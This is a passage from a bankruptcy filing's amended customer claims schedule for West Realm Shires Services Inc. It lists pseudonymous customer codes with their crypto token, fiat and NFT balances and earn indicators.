| 07357135 | | DOGE[.06966491], USD[0.00] | Yes | |
| 07357136 | | DOGE[.00368438], USD[0.00] | | |
| 07357137 | | USD[10.00] | | |
| 07357138 | | USD[10.00] | | |
| 07357139 | | USD[0.00], USDT[0] | | |
| 07357140 | | NFT (323285544496649532/Coachella x FTX Weekend 1 #31233)[1] | | |
| 07357141 | | CUSDT[1], TRX[1], USD[0.01] | | |
| 07357142 | | CUSDT[10], DOGE[1030.30047215], ETH[.0055116], ETHW[.0054432], LTC[.05865342], SOL[1.00797687], TRX[112.04213612], USD[0.00] | Yes | |
| 07357143 | | USD[10.00] | | |
| 07357144 | | USD[10.00] | | |
| 07357145 | | USD[10.00] | | |
| 07357146 | | CUSDT[1.0292494], DOGE[1.07300905], ETH[.00350079], ETHW[0.00350079], USD[0.00] | | |
| 07357147 | | BRZ[1], CUSDT[7], DOGE[1], TRX[4], USD[0.14] | Yes | |
| 07357149 | | USD[10.00] | | |
| 07357150 | | USD[0.00], USDT[0] | | |
| 07357151 | | USD[10.00] | | |
| 07357152 | | DOGE[1248.53907013], USD[0.01] | | |
| 07357153 | | BTC[.00017897], CUSDT[9], DOGE[2], SOL[.02012133], TRX[8], USD[1.01], USDT[0] | Yes | |
| 07357155 | | BTC[0], CUSDT[3], DOGE[1], ETH[0], ETHW[0], GRT[1], SHIB[2], TRX[1], USD[0.65] | Yes | |
| 07357158 | | USD[1010.00] | | |
| 07357159 | | USD[10.00] | | |
| 07357160 | | USD[10.00] | | |
| 07357161 | | BRZ[0], BTC[0], DOGE[0], USD[0.00] | | |
| 07357162 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07357165 | | USD[10.00] | | |
| 07357166 | | CUSDT[1], DOGE[1260.35292637], USD[0.00] | | |
| 07357167 | | USD[10.00] | | |
| 07357169 | | USD[10.00] | | |
| 07357170 | | USD[10.00] | | |
| 07357171 | | USD[0.03] | | |
| 07357172 | | USD[0.00] | | |
| 07357173 | | USD[10.00] | | |
| 07357174 | | USD[10.00] | | |
| 07357176 | | DOGE[844.78247602], USD[0.00] | | |
| 07357177 | | BTC[0], ETH[0], ETHW[0], SHIB[1], USD[0.01] | Yes | |
| 07357178 | | BRZ[1], USD[0.00] | | |
| 07357179 | | USD[10.00] | | |
| 07357183 | | DOGE[26.2165103], USD[0.00] | | |
| 07357184 | | CUSDT[1], TRX[1], USD[10.00] | | |
| 07357185 | | USD[10.00] | | |
| 07357188 | | LTC[.05239395], USD[0.00] | | |
| 07357189 | | BAT[1], DOGE[.00003447], USD[0.00] | | |
| 07357190 | | USD[0.00] | | |
| 07357191 | | CUSDT[3], ETH[0], ETHW[0], LTC[0], TRX[87.20830977], USD[0.00] | Yes | |
| 07357192 | | DOGE[2547.24425153], USD[10.00] | | |
| 07357193 | | DOGE[25366.5208599], TRX[1], USD[10.00] | | |
| 07357194 | | DOGE[381.9450281], USD[10.00] | | |
| 07357195 | | USD[10.00] | | |
| 07357196 | | DOGE[933.29105109], GRT[0], SHIB[3872680.42955533], USD[0.00], USDT[0] | | |
| 07357197 | | CUSDT[2], DOGE[.00004332], TRX[1], USD[0.00] | Yes | |
| 07357199 | | TRX[1], USD[0.00] | | |
| 07357200 | | ETH[3.9897978], ETHW[3.9897978], LINK[.0983], SOL[88.12945561], USD[0.01], USDT[.002] | | |
| 07357201 | | USD[10.00] | | |
| 07357202 | | BRZ[1], CUSDT[4], DOGE[739.44819022], ETH[.02621934], ETHW[.02621934], UNI[5.48782879], USD[0.56] | | |
| 07357204 | | USD[10.00] | | |
| 07357205 | | BTC[.00021542], TRX[1], USD[0.00] | | |
| 07357206 | | USD[7.64] | | |
| 07357208 | | USD[10.00] | | |
| 07357209 | | USD[10.00] | | |
| 07357210 | | USD[10.00] | | |
| 07357211 | | CUSDT[1], SHIB[1], USD[0.01] | | |
| 07357212 | | DOGE[74.41391719], USD[0.00] | | |
| 07357213 | | USD[10.00] | | |
| 07357214 | | BRZ[2], CUSDT[.00017116], DOGE[1474.30751345], KSHIB[.89687642], SHIB[851773.21928668], SOL[.05005595], TRX[1.85059816], USD[0.00] | Yes | |
| 07357215 | | USD[10.00] | | |
| 07357216 | | USD[10.00] | | |
| 07357217 | | USD[10.87] | Yes | |
| 07357218 | | BRZ[0], BTC[0], DOGE[0.00446514], ETH[0], LINK[0], TRX[0], USD[0.00] | | |
| 07357219 | | USD[10.00] | | |
| 07357220 | | USD[10.00] | | |
| 07357222 | | CUSDT[1], DOGE[0.00001108], ETH[0], TRX[1], USD[0.01] | | |
| 07357225 | | AVAX[28.53706416], BAT[68.34249252], DOGE[57399.87792289], ETH[1.14350831], ETHW[38.07734197], GRT[.00030119], KSHIB[3582.18182107], LINK[27.43164405], MATIC[581.67184128], NEAR[55.37697551], NFT (40315239445795181 4/Entrance Voucher #29387)[1], NFT (476676206907015593/3D CATPUNK #3185)[1], SHIB[8237626.2418871], SOL[15.41830527], SUSHI[116.57600517], TRX[734.21041214], USD[14.90], USDT[0.00000001] | Yes | |
| 07357226 | | BRZ[1], CUSDT[2], DOGE[1], TRX[1], USD[0.00] | | |
| 07357227 | | USD[10.00] | | |
| 07357228 | | BRZ[2], CUSDT[2], DOGE[.00089919], USD[0.11] | | |
| 07357229 | | DOGE[1], TRX[1], USD[10.00] | | |
| 07357230 | | DOGE[1], ETH[.13580585], ETHW[.13580585], USD[0.00] | | |
| 07357232 | | USD[0.00] | | |
| 07357233 | | CUSDT[4], DOGE[46.19586298], ETH[.00155483], ETHW[.00154115], NFT (348608224021186950/Entrance Voucher #4267)[1], SUSHI[.49080639], USD[0.01] | Yes | |
| 07357234 | | USD[10.00] | | |
| 07357236 | | USD[10.00] | | |

West Realm Shires Services Inc.

Amended Schedule F-12 priority Scheduled Customer Change

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07357237 | | BRZ[2], CUSDT[1], GRT[1], TRX[4], USD[0.33] | | |
| 07357239 | | USD[10.00] | | |
| 07357240 | | USD[10.00] | | |
| 07357241 | | BTC[0], DOGE[0], ETH[0], ETHW[0.02050495], KSHIB[18.21334411], SHIB[119876.62854795], TRX[1], USD[28.21] | Yes | |
| 07357242 | | CUSDT[5190.91584988], DOGE[.66138507], ETH[.0709553], ETHW[.07007474], TRX[728.89030883], USD[-33.53] | Yes | |
| 07357243 | | USD[10.00] | | |
| 07357245 | | CUSDT[1], DOGE[1.00000161], TRX[1], USD[0.00] | | |
| 07357247 | | BRZ[1], CUSDT[2], DOGE[28180.50162079], TRX[1], USD[0.00] | Yes | |
| 07357248 | | USD[12.30] | | |
| 07357249 | | BRZ[1], CUSDT[1], DOGE[1.00002193], USD[0.00] | | |
| 07357250 | | CUSDT[1], USD[101.47] | Yes | |
| 07357251 | | USD[10.00] | | |
| 07357252 | | USD[10.00] | | |
| 07357253 | | CUSDT[1], DOGE[1.57197758], ETH[.0001988], ETHW[.0001988], USD[0.47] | Yes | |
| 07357254 | | USD[10.00] | | |
| 07357255 | | BRZ[1], DOGE[2], TRX[1], USD[0.00], USDT[1] | | |
| 07357256 | | USD[10.00] | | |
| 07357257 | | BTC[.00020169], USD[0.00] | | |
| 07357258 | | BTC[.00000002], USD[0.00] | | |
| 07357259 | | DOGE[823.48449814], USD[0.00] | | |
| 07357260 | | DOGE[.00127334], USD[10.01] | Yes | |
| 07357261 | | CUSDT[5], USD[0.00] | | |
| 07357262 | | CUSDT[1], DOGE[40.28420258], USD[0.00] | | |
| 07357263 | | USD[10.00] | | |
| 07357264 | | USD[10.00] | | |
| 07357265 | | DOGE[141.33336725], USD[0.00] | | |
| 07357266 | | USD[10.00] | | |
| 07357267 | | USD[10.00] | | |
| 07357269 | | CUSDT[1], SOL[.07876519], USD[0.00] | Yes | |
| 07357270 | | USD[10.00] | | |
| 07357271 | | USD[10.00] | | |
| 07357272 | | USD[10.00] | | |
| 07357273 | | USD[10.00] | | |
| 07357274 | | USD[10.00] | | |
| 07357275 | | ETH[0], ETHW[0], USD[0.00] | Yes | |
| 07357276 | | DOGE[2], USD[0.59] | | |
| 07357277 | | DOGE[2], USD[0.00], USDT[0] | | |
| 07357278 | | BRZ[1], BTC[0], CUSDT[9], DOGE[2.00004242], ETH[0.00890643], ETHW[0.00879698], SOL[0], TRX[3], USD[0.58], USDT[.00142558] | Yes | |
| 07357279 | | USD[10.00] | | |
| 07357280 | | USD[10.00] | | |
| 07357281 | | USD[10.00] | | |
| 07357282 | | USD[10.00] | | |
| 07357284 | | BAT[123.1129655], CUSDT[3], DOGE[7027.85470643], GRT[34.3698215], LTC[.62034512], TRX[1433.86346874], USD[0.00], USDT[1] | | |
| 07357285 | | USD[10.00] | | |
| 07357286 | | USD[10.00] | | |
| 07357287 | | BRZ[0], BTC[0.00000698], ETH[0], USD[0.00] | | |
| 07357290 | | USD[10.00] | | |
| 07357293 | | BTC[.00022121], USD[0.00] | | |
| 07357294 | | USD[0.01], USDT[0] | Yes | |
| 07357295 | | USD[10.00] | | |
| 07357296 | | BTC[0], CUSDT[1], DOGE[0], TRX[1], USD[0.00] | Yes | |
| 07357297 | | DOGE[.00000251], GRT[1], SHIB[1], TRX[1], USD[0.00] | | |
| 07357298 | | BAT[4.30850493], BRZ[1], CUSDT[6], DOGE[2], SHIB[2], SOL[0], TRX[1], USD[0.00], USDT[1.08464491] | Yes | |
| 07357299 | | USD[10.00] | | |
| 07357300 | | BRZ[0.00005771], CUSDT[3], DOGE[1], GRT[1], TRX[4], USD[20.00] | | |
| 07357301 | | BRZ[1], BTC[0], CUSDT[2], DOGE[1], GRT[1], SHIB[.00000004], TRX[4], USD[0.00], USDT[0] | Yes | |
| 07357304 | | USD[10.00] | | |
| 07357305 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07357307 | | USD[10.00] | | |
| 07357308 | | DOGE[127.97185847], TRX[1], USD[0.00] | | |
| 07357309 | | BTC[0], CUSDT[4], TRX[0.0069914], USD[0.00], USDT[0.00000017] | Yes | |
| 07357310 | | GBP[0.00], USD[0.00] | | |
| 07357311 | | USD[10.00] | | |
| 07357312 | | USD[10.00] | | |
| 07357313 | | BAT[0], BTC[0], DOGE[0], TRX[0], USD[0.00] | | |
| 07357314 | | USD[10.00] | | |
| 07357315 | | CUSDT[2], DOGE[0], USD[0.01], USDT[1] | | |
| 07357322 | | BAT[6.64162871], TRX[100.69245279], USD[0.00] | | |
| 07357323 | | TRX[208.0702545], USD[0.00] | | |
| 07357324 | | USD[10.00] | | |
| 07357325 | | USD[0.00], USDT[0] | | |
| 07357326 | | USD[10.00] | | |
| 07357327 | | USD[10.00] | | |
| 07357328 | | BAT[1], BRZ[1], CUSDT[1], DOGE[0], TRX[2], USD[0.01] | | |
| 07357330 | | BRZ[1], CUSDT[2], DOGE[1], USD[0.00] | | |
| 07357331 | | DOGE[1], USD[0.00] | | |
| 07357332 | | DOGE[1], USD[0.00] | | |
| 07357333 | | USD[10.00] | | |
| 07357335 | | USD[10.00] | | |
| 07357336 | | USD[10.00] | | |
| 07357337 | | AVAX[0], BTC[0], DOGE[1], ETH[0], SHIB[3], SOL[0], SUSHI[0.00018918], USD[0.00] | Yes | |
| 07357338 | | USD[0.00] | | |
| 07357339 | | USD[10.00] | | |
| 07357340 | | BRZ[0], DOGE[0], LINK[0], SOL[0], TRX[0], USD[0.00], USDT[0] | | |
| 07357341 | | USD[0.06] | | |
| 07357342 | | CUSDT[5], ETH[.00000001], ETHW[0], KSHIB[0], MATIC[1.51458714], MKR[0], SHIB[0], SOL[.00717272], TRX[2], USD[2.46], USDT[0] | Yes | |
| 07357343 | | DOGE[1], USD[0.00] | | |
| 07357344 | | CUSDT[1], DOGE[1], TRX[2], USD[0.00] | | |
| 07357346 | | USD[10.00] | | |
| 07357347 | | USD[10.00] | | |
| 07357349 | | USD[10.00] | | |
| 07357350 | | USD[10.00] | | |
| 07357351 | | USD[10.00] | | |
| 07357352 | | BAT[1.01540501], BRZ[2], CUSDT[8], DOGE[2.0737855], ETH[.00000389], ETHW[.00000389], GRT[1], TRX[5], USD[0.00], USDT[1.08850292] | Yes | |
| 07357353 | | USD[10.00] | | |
| 07357355 | | USD[10.00] | | |
| 07357356 | | USD[10.00] | | |
| 07357357 | | BTC[.0001737], USD[0.00] | | |
| 07357358 | | DOGE[0], ETH[0], SOL[0], SUSHI[0], USD[1.04] | | |
| 07357359 | | CUSDT[1], DOGE[561.86528021], USD[0.00] | | |
| 07357361 | | USD[10.00] | | |
| 07357362 | | USD[10.00] | | |
| 07357363 | | CUSDT[1], DOGE[1874.51374374], USD[0.00] | Yes | |
| 07357364 | | BRZ[2], CUSDT[2], DOGE[5], TRX[1], USD[0.00] | | |
| 07357365 | | DOGE[308.97673400], USD[10.00] | | |
| 07357367 | | USD[10.00] | | |
| 07357369 | | USD[10.00] | | |
| 07357370 | | BRZ[1], DOGE[47.06773286], ETHW[.00420225], SHIB[2], TRX[1], USD[0.00] | | |
| 07357371 | | USD[10.00] | | |
| 07357373 | | USD[10.00] | | |
| 07357374 | | BCH[0], BRZ[1], BTC[0], CUSDT[5], DOGE[3], SOL[0], SUSHI[0], TRX[4], UNI[0], USD[0.00] | | |
| 07357375 | | BRZ[1], CUSDT[235.86340579], DOGE[.00936995], TRX[2], USD[0.01] | | |
| 07357376 | | BRZ[2], CUSDT[.0038169], DOGE[8605.28389997], ETH[.14116066], ETHW[.14116066], GRT[206.8462088], LINK[50.9138128], LTC[2.44510864], SHIB[1], SUSHI[15.01202599], TRX[5], UNI[.95964835], USD[12.83] | | |
| 07357377 | | BAT[2.10969197], BRZ[3], BTC[.0243321], CUSDT[3], DOGE[10380.670513], GRT[1.00379292], LINK[8.57667378], LTC[3.63827227], SOL[102.21279184], TRX[1], USD[0.00], USDT[1.0984667] | Yes | |
| 07357378 | | USD[10.00] | | |
| 07357379 | | BRZ[22.00485992], CUSDT[144.16270248], DOGE[0.00001433], GRT[1.00313735], SHIB[26111641.58767386], SOL[0.00003260], TRX[36.25271035], UNI[0], USD[69.20], USDT[1.10440353] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07357380 | | TRX[1.00036698], USD[0.85] | | |
| 07357382 | | CUSDT[9], DOGE[1], TRX[7], USD[0.01] | | |
| 07357383 | | USD[10.00] | | |
| 07357385 | | USD[10.00] | | |
| 07357386 | | USD[10.00] | | |
| 07357387 | | USD[10.00] | | |
| 07357388 | | USD[10.00] | | |
| 07357390 | | USD[10.00] | | |
| 07357391 | | USD[0.00] | | |
| 07357392 | | BRZ[2], CUSDT[5], DOGE[2294.54562534], GRT[1.00253279], KSHIB[1503.51160169], SHIB[24037356.65169831], TRX[2], USD[0.00] | Yes | |
| 07357394 | | BCH[.03866096], BRZ[1], CUSDT[429.93423742], DOGE[5], ETH[.0237802], ETHW[.0237802], GRT[20.11028758], LTC[.12061069], PAXG[.00836068], TRX[482.02318441], USD[0.04] | | |
| 07357395 | | USD[10.00] | | |
| 07357396 | | USD[232.46] | Yes | |
| 07357397 | | USD[10.00] | | |
| 07357398 | | USD[10.00] | | |
| 07357399 | | BTC[.00000363], CUSDT[1], DOGE[47.76992198], TRX[1], USD[0.29] | | |
| 07357400 | | AVAX[0], BRZ[1], DOGE[1], ETHW[.02814689], NFT (452913640117599397/Saudi Arabia Ticket Stub #1039)[1], SHIB[10], SOL[.00003896], TRX[3], USD[0.00], USDT[0] | Yes | |
| 07357401 | | USD[70.00] | | |
| 07357402 | | USD[10.00] | | |
| 07357403 | | USD[10.00] | | |
| 07357404 | | BTC[.00128252], CUSDT[8], ETH[.01464988], ETHW[.01447204], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07357405 | | DOGE[16.40037321], USD[0.00] | | |
| 07357406 | | USD[10.00] | | |
| 07357407 | | USD[10.00] | | |
| 07357408 | | BAT[30.76798287], BCH[.87834814], BRZ[2], BTC[.00518853], CUSDT[2548.64056878], DAI[54.28894246], DOGE[8680.30791748], ETH[.31245263], ETHW[.31226738], GRT[75.38794831], LINK[3.80340737], MATIC[94.65364699], NFT (361724315302645375/Route 66)[1], SHIB[2397555.87236252], SOL[1.08039008], SUSHI[5.2274052], TRX[836.91553782], UNI[5.13138824], USD[0.21], USDT[0] | Yes | |
| 07357409 | | CUSDT[4], DOGE[0], LINK[0], TRX[1], USD[0.00] | | |
| 07357410 | | USD[10.00] | | |
| 07357411 | | SOL[0], USD[0.00], USDT[0.00000059] | Yes | |
| 07357412 | | USD[10.00] | | |
| 07357413 | | CUSDT[1], USD[10.00] | | |
| 07357414 | | CUSDT[1], ETH[0], USD[0.00] | | |
| 07357415 | | USD[10.00] | | |
| 07357416 | | USD[10.00] | | |
| 07357417 | | USD[10.00] | | |
| 07357418 | | USD[0.00] | | |
| 07357419 | | BCH[.28527631], BTC[.00689222], CUSDT[9], DOGE[505.41210904], ETH[.11483693], ETHW[.11483693], GRT[7.02626009], LINK[1.35556726], LTC[1.27865448], MATIC[28.68486869], SHIB[15], SOL[10.58123561], TRX[2], USD[6.98], USDT[0] | | |
| 07357420 | | USD[10.00] | | |
| 07357421 | | USD[10.00] | | |
| 07357422 | | DOGE[7383.08514808], SHIB[10158381.17277747], USD[0.00] | | |
| 07357425 | | USD[10.00] | | |
| 07357426 | | USD[10.00] | | |
| 07357427 | | BAT[1], BRZ[2], CUSDT[5], DOGE[2], GRT[0], LINK[0], LTC[0], SUSHI[0], TRX[4], USD[0.00] | | |
| 07357428 | | CUSDT[6], DOGE[3], ETHW[.17881199], TRX[2], USD[0.00] | Yes | |
| 07357429 | | USD[0.33] | Yes | |
| 07357431 | | USD[10.00] | | |
| 07357432 | | BRZ[2], CUSDT[.0030525], CUSDT[2], DOGE[278.42553663], TRX[2], USD[0.01], USDT[1] | | |
| 07357433 | | CUSDT[11], DOGE[1], ETH[.00000001], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07357434 | | USD[10.00] | | |
| 07357435 | | USD[10.00] | | |
| 07357436 | | BAT[2.06339967], BRZ[4], CUSDT[26], GRT[1.00342595], SHIB[4], TRX[3], USD[4174.69], USDT[0.00041309] | Yes | |
| 07357437 | | CUSDT[1], GRT[0], TRX[1], USD[0.00] | | |
| 07357438 | | USD[0.00] | | |
| 07357439 | | USD[10.00] | | |
| 07357440 | | BRZ[4], CUSDT[11], TRX[0.00581472], USD[0.00], USDT[0] | | |
| 07357442 | | USD[10.00] | | |
| 07357443 | | BTC[.00002238], USD[0.00] | | |
| 07357444 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07357445 | | BTC[0], DOGE[9.99683445], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07357446 | | USD[10.00] | | |
| 07357447 | Contingent, Disputed | BRZ[0], BTC[0], CUSDT[1], DOGE[0.05050575], USD[0.00] | | |
| 07357448 | | CUSDT[2], SHIB[1], TRX[1], USD[0.16] | | |
| 07357449 | | TRX[2], USD[0.01], USDT[1] | | |
| 07357450 | | USD[10.00] | | |
| 07357451 | | USD[10.00] | | |
| 07357454 | | USD[10.00] | | |
| 07357455 | | DOGE[12.768], USD[0.00] | | |
| 07357457 | | USD[10.00] | | |
| 07357459 | | CUSDT[442.9236291], USD[0.00] | Yes | |
| 07357460 | | USD[10.00] | | |
| 07357463 | | USD[10.00] | | |
| 07357465 | | USD[10.00] | | |
| 07357466 | | USD[10.00] | | |
| 07357467 | | CUSDT[2], TRX[2], USD[377.04] | | |
| 07357468 | | ETH[0], USD[0.00] | Yes | |
| 07357469 | | DOGE[1.00096618], TRX[1.37426208], USD[105.74] | | |
| 07357470 | | USD[10.00] | | |
| 07357471 | | USD[10.00] | | |
| 07357472 | | USD[0.00] | | |
| 07357473 | | USD[10.00] | | |
| 07357474 | | USD[10.00] | | |
| 07357475 | | BAT[.00171416], BTC[.00000061], DOGE[.01104154], ETH[.00002681], ETHW[.00002679], LINK[.00005646], LTC[.00001017], UNI[.00008374], USD[0.06], USDT[0] | Yes | |
| 07357476 | | USD[10.00] | | |
| 07357478 | | DOGE[1513.25288595], TRX[1], USD[0.00] | Yes | |
| 07357480 | | BRZ[1], CUSDT[4], TRX[2], USD[0.00] | | |
| 07357481 | | USD[10.00] | | |
| 07357482 | | USD[10.00] | | |
| 07357483 | | DOGE[139.49721298], USD[0.00] | | |
| 07357484 | | SHIB[39868.50775649], USD[0.00], USDT[0.00000001] | Yes | |
| 07357485 | | USD[10.00] | | |
| 07357486 | | BRZ[1], BTC[.02697366], CUSDT[3], DOGE[1], SHIB[1], TRX[3], USD[449.91] | | |
| 07357487 | | USD[10.00] | | |
| 07357488 | | SUSHI[.59845688], USD[0.00] | | |
| 07357489 | | ALGO[0], AUD[0.00], BAT[0], BCH[0], BF_POINT[300], BTC[0], DOGE[0], ETH[0], ETHW[0], LINK[0], LTC[0], MATIC[0], SHIB[2], TRX[0], USD[0.01], USDT[0] | Yes | |
| 07357490 | | USD[10.00] | | |
| 07357491 | | BRZ[1], DOGE[1], USD[0.01] | | |
| 07357492 | | USD[10.00] | | |
| 07357493 | | USD[10.00] | | |
| 07357494 | | USD[210.00] | | |
| 07357495 | | SHIB[33199.87613193], USD[0.00] | Yes | |
| 07357496 | | USD[0.01] | | |
| 07357497 | | DOGE[1], TRX[1], USD[0.00] | | |
| 07357498 | Contingent, Disputed | USD[0.07] | | |
| 07357499 | | USD[10.00] | | |
| 07357500 | | USD[10.00] | | |
| 07357501 | | USD[10.87] | Yes | |
| 07357502 | | USD[10.00] | | |
| 07357504 | | CUSDT[1], USD[0.01] | | |
| 07357505 | | USD[10.00] | | |
| 07357506 | | BTC[0], DAI[679.57597494], DOGE[2], SHIB[1], SUSHI[0], TRX[8], USD[0.00] | Yes | |
| 07357507 | | USD[0.01], USDT[1] | | |
| 07357508 | | USD[10.00] | | |
| 07357509 | | USD[10.00] | | |
| 07357510 | | CUSDT[3], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07357512 | | CUSDT[3], DOGE[56.37273926], USD[0.00] | | |
| 07357513 | | CUSDT[3], TRX[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07357515 | | USD[10.00] | | |
| 07357516 | | AVAX[4.19822211], DOGE[0], USD[0.00], USDT[0] | Yes | |
| 07357517 | | USD[10.00] | | |
| 07357518 | | USD[10.00] | | |
| 07357519 | | BRZ[0], USD[0.00], USDT[0] | Yes | |
| 07357520 | | USD[10.00] | | |
| 07357521 | | USD[10.00] | | |
| 07357522 | | USD[10.00] | | |
| 07357525 | | BAT[1], BTC[0], CUSDT[2], DOGE[2], GRT[0], TRX[1], USD[0.00] | | |
| 07357526 | | CUSDT[3], DOGE[1055.57294939], LTC[.18617692], TRX[1], USD[0.51] | | |
| 07357527 | | USD[10.00] | | |
| 07357528 | | BTC[0], ETH[.00000002], ETHW[.00000002], SOL[.00000053], USD[0.01], USDT[0.00000001] | Yes | |
| 07357529 | | DOGE[19.47308935], USD[0.00] | | |
| 07357530 | | BCH[0.00928660], BTC[0], USD[10.90] | | |
| 07357531 | | CUSDT[5], SOL[.0000326], TRX[2], USD[0.01] | | |
| 07357532 | | USD[10.00] | | |
| 07357534 | | DOGE[1], USD[0.00] | | |
| 07357535 | | BRZ[1], CUSDT[2], USD[0.01] | | |
| 07357536 | | USD[0.01], USDT[0] | | |
| 07357537 | | USD[10.00] | | |
| 07357538 | | CUSDT[3], KSHIB[548.150032], SHIB[1], USD[0.01] | | |
| 07357539 | | USD[10.00] | | |
| 07357540 | | USD[10.00] | | |
| 07357541 | | DOGE[1], USD[10.65] | | |
| 07357542 | | USD[10.00] | | |
| 07357543 | | TRX[2], USD[0.00] | Yes | |
| 07357544 | | DOGE[1], USD[4.22] | | |
| 07357545 | | CUSDT[2], DOGE[6418.90414386], TRX[1], USD[0.00] | | |
| 07357546 | | USD[10.00] | | |
| 07357547 | | USD[10.00] | | |
| 07357548 | | DOGE[177.55536797], USD[0.00] | | |
| 07357549 | | DOGE[267.14545810], USD[0.02] | Yes | |
| 07357550 | | USD[0.00] | | |
| 07357551 | | USD[10.00] | | |
| 07357552 | | CUSDT[1], DOGE[5], TRX[422.00845557], USD[0.00] | | |
| 07357553 | | DOGE[5326.55738417], TRX[1], USD[760.00] | | |
| 07357554 | | USD[10.00] | | |
| 07357555 | | USD[10.00] | | |
| 07357556 | | USD[10.00] | | |
| 07357557 | | SOL[.35865529], USD[10.00] | | |
| 07357558 | | DOGE[21.7809304], USD[0.00] | | |
| 07357559 | | CUSDT[1], USD[0.00] | | |
| 07357560 | | USD[10.00] | | |
| 07357561 | | BRZ[1], CUSDT[1], DOGE[1], TRX[3], USD[0.01] | | |
| 07357562 | | USD[10.00] | | |
| 07357564 | | DOGE[7054.84576841], SHIB[657959.144706], SUSHI[17.07347892], USD[0.24] | Yes | |
| 07357567 | | DOGE[1], TRX[2], USD[10.00] | | |
| 07357568 | | USD[10.00] | | |
| 07357570 | | DOGE[567.04692076], TRX[95.10853929], USD[0.00] | | |
| 07357571 | | USD[110.00] | | |
| 07357573 | | CUSDT[2], DOGE[.00471302], ETH[.00008298], ETHW[.00008298], TRX[.28037811], UNI[.00019509], USD[0.00] | | |
| 07357574 | | USD[10.00] | | |
| 07357575 | | USD[10.00] | | |
| 07357576 | | USD[10.00] | | |
| 07357577 | | USD[10.00] | | |
| 07357578 | | USD[10.00] | | |
| 07357579 | | USD[10.00] | | |
| 07357580 | | CUSDT[2], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07357581 | | USD[10.16] | | |
| 07357582 | | BCH[.01533579], USD[0.00] | | |
| 07357583 | | BRZ[3], CUSDT[9], DOGE[46.63560164], USD[24.40] | | |
| 07357584 | | BRZ[0.00177995], BTC[0], DOGE[1], SUSHI[0], USD[10.00] | | |
| 07357586 | | CUSDT[4], LTC[.21803561], TRX[6], USD[0.01] | | |
| 07357587 | | CUSDT[2], SHIB[1], USD[123.33] | | |
| 07357588 | | USD[11.06] | Yes | |
| 07357589 | | USD[10.00] | | |
| 07357590 | | CUSDT[2], DOGE[200.37287926], SOL[.0002755], TRX[4], USD[0.22] | | |
| 07357591 | | USD[0.38] | | |
| 07357592 | | USD[10.00] | | |
| 07357593 | | BTC[0], DAI[0], MATIC[13.95147442], USD[0.00] | Yes | |
| 07357595 | | USD[10.00] | | |
| 07357596 | | USD[10.00] | | |
| 07357598 | | CUSDT[1], DOGE[554.18381393], USD[0.00] | | |
| 07357599 | | DOGE[277.60223678], SHIB[606405.09088548], TRX[1], USD[0.00] | Yes | |
| 07357600 | | BTC[.0000011], CUSDT[2], DOGE[28.20868776], USD[0.00] | Yes | |
| 07357601 | | BRZ[1], DOGE[3], SHIB[41974348.06811087], USD[0.00], USDT[0] | | |
| 07357602 | | USD[10.00] | | |
| 07357603 | | USD[10.00] | | |
| 07357604 | | DOGE[1], TRX[1], USD[0.01] | | |
| 07357605 | | DOGE[1], TRX[1], USD[0.00] | | |
| 07357606 | | BTC[0.00023819], DOGE[1], USD[0.00] | | |
| 07357607 | | BRZ[1], BTC[0], DOGE[0], ETH[0], TRX[1], USD[0.00] | | |
| 07357608 | | USD[10.00] | | |
| 07357610 | | USD[10.00] | | |
| 07357611 | | BF_POINT[100], DOGE[802.25668833], SHIB[3388915.05109169], USD[0.06] | Yes | |
| 07357614 | | USD[10.00] | | |
| 07357615 | | USD[10.00] | | |
| 07357616 | | USD[15.60] | | |
| 07357617 | | BCH[0], BRZ[0], DOGE[0], GRT[0], USD[0.00], USDT[0] | | |
| 07357618 | | USD[10.00] | | |
| 07357619 | | BTC[0], DOGE[0], ETH[0], TRX[0] | | |
| 07357620 | | USD[10.00] | | |
| 07357621 | | DOGE[1], USD[0.01] | | |
| 07357624 | | USD[30.00] | | |
| 07357625 | | CUSDT[2], DOGE[1], USD[0.00], USDT[0] | | |
| 07357626 | | BTC[.01086792], CUSDT[1], DOGE[12745.63986564], ETH[.51160452], ETHW[.5113897], GRT[1], SHIB[9911295.20436403], TRX[1], USD[0.25] | Yes | |
| 07357627 | | USD[10.83] | Yes | |
| 07357628 | | DOGE[0], ETH[0], TRX[0], USD[0.00], USDT[0] | | |
| 07357630 | | USD[10.00] | | |
| 07357631 | | CUSDT[1], DOGE[9111.52406896], USD[0.00] | Yes | |
| 07357632 | | USD[10.00] | | |
| 07357633 | | CUSDT[1], DOGE[593.14026012], USD[0.00] | | |
| 07357634 | | DOGE[1], SHIB[1], SUSHI[86.74089119], TRX[10720.79590839], USD[0.00] | Yes | |
| 07357635 | | USD[10.00] | | |
| 07357636 | | USD[0.00] | | |
| 07357637 | | DOGE[0], GRT[0], TRX[269.48095311], USD[0.00], USDT[0] | | |
| 07357639 | | MATIC[.00016358], SHIB[1], USD[0.00] | Yes | |
| 07357640 | | BRZ[18.56278783], DOGE[27.41393838], USD[0.00] | Yes | |
